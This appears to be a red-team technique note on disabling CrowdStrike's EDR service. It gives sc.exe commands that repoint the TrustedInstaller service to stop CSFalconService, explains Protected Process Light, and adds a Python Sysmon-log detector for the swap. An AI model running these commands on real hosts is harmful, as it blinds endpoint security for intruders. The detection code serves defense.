Assumptions

  • Tester has achieved a method of command execution in SYSTEM context.
  • The TrustedInstaller service is not currently running.

Procedure

Given an insecure implementation and command execution as SYSTEM, it is possible to stop common EDR services, such as CrowdStrike's, via the TrustedInstaller service.

  1. Reconfigure the TrustedInstaller service so that its binary path stops the target service.
     sc.exe config TrustedInstaller binPath= "cmd /c sc stop CSFalconService"
  2. Start the TrustedInstaller service.
     sc.exe start "TrustedInstaller"
  3. Reconfigure TrustedInstaller to point back at its original binary.
     sc.exe config TrustedInstaller binPath= "C:\Windows\servicing\TrustedInstaller.exe"

Explanation

  • Windows implements something called Protected Process Light (PPL).
  • It is pretty much just access control at the process level: only particular contexts can manage a protected process or access its memory.
    • TrustedInstaller, which is a virtual context rather than an actual user account, is, well, trusted.
    • There is also a TrustedInstaller Windows service, which acts as the proxy here.
  • Whether a process runs as PPL can be checked with Process Explorer, etc.
  • CSFalconService.exe (iirc) runs as PPL.
  • Reconfigure the TrustedInstaller service to stop CSFalconService, and BOOM, it is (temporarily) dead.
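From the defender's side, the procedure above leaves two traces: a write to the TrustedInstaller service's ImagePath registry value and an sc.exe command line that reconfigures that service. The following is an added example, not part of the original notes: a small Python scanner over constructed Sysmon-style JSON records (EventID 13 RegistryEvent and EventID 1 ProcessCreate are real Sysmon event IDs; the JSON layout and the sample records are assumed) that flags any TrustedInstaller ImagePath value other than the expected binary and any sc.exe reconfiguration of that service's binPath.

```python
"""Flag the TrustedInstaller binPath swap in Sysmon-style JSON log lines. Field names
follow Sysmon's schema (13 = RegistryEvent value set, 1 = ProcessCreate); samples are constructed."""
import json

# Legitimate service binary (the path the restore step points back to).
EXPECTED_IMAGE_PATH = r"C:\Windows\servicing\TrustedInstaller.exe"
IMAGEPATH_SUFFIX = r"\services\trustedinstaller\imagepath"

# Constructed sample: a benign ImagePath write, the swap, the sc.exe command
# that performed it, and the service start (paths use JSON-escaped backslashes).
SAMPLE_LOG = r'''
{"EventID": 13, "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\TrustedInstaller\\ImagePath", "Details": "C:\\Windows\\servicing\\TrustedInstaller.exe"}
{"EventID": 13, "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\TrustedInstaller\\ImagePath", "Details": "cmd /c sc stop CSFalconService"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\sc.exe", "CommandLine": "sc.exe config TrustedInstaller binPath= \"cmd /c sc stop CSFalconService\"", "User": "NT AUTHORITY\\SYSTEM"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\sc.exe", "CommandLine": "sc.exe start \"TrustedInstaller\"", "User": "NT AUTHORITY\\SYSTEM"}
'''


def classify(event):
    """Return a finding string for one parsed event, or None if it looks benign."""
    eid = event.get("EventID")
    if eid == 13 and event.get("TargetObject", "").lower().endswith(IMAGEPATH_SUFFIX):
        details = event.get("Details", "")
        if details.lower() != EXPECTED_IMAGE_PATH.lower():
            return f"TrustedInstaller ImagePath set to unexpected value: {details}"
    if eid == 1:
        cmd = event.get("CommandLine", "").lower()
        if all(tok in cmd for tok in ("config", "trustedinstaller", "binpath=")):
            return f"TrustedInstaller service binary reconfigured via: {event['CommandLine']}"
    return None


def scan(log_text):
    """Parse JSON lines and collect findings; blank or malformed lines are skipped."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = classify(event)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("ALERT:", finding)
```

The restore in step 3 writes the expected path back, so it is not flagged; the swap and the command that made it both are.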

References